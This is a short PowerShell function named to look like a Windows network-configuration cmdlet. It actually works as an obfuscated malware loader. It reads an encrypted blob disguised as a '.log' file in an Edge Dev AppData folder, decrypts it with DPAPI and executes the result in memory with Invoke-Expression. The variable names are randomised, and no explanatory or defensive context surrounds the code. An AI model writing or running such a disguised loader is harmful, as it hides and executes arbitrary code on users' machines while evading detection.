function AzureSet-NetConnectionProfile {
        Add-Type -AssemblyName 'System.Security';
$kpewcstjrnuldz=[System.IO.File]::ReadAllBytes('C:\Users\Sena Kimbrell\AppData\Local\Microsoft\Edge Dev\Set-NetConnectionProfile.log');
$vzmfyo = [System.Security.Cryptography.ProtectedData]::Unprotect($kpewcstjrnuldz, $null, [System.Security.Cryptography.DataProtectionScope]::Localmachine)
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($vzmfyo))}
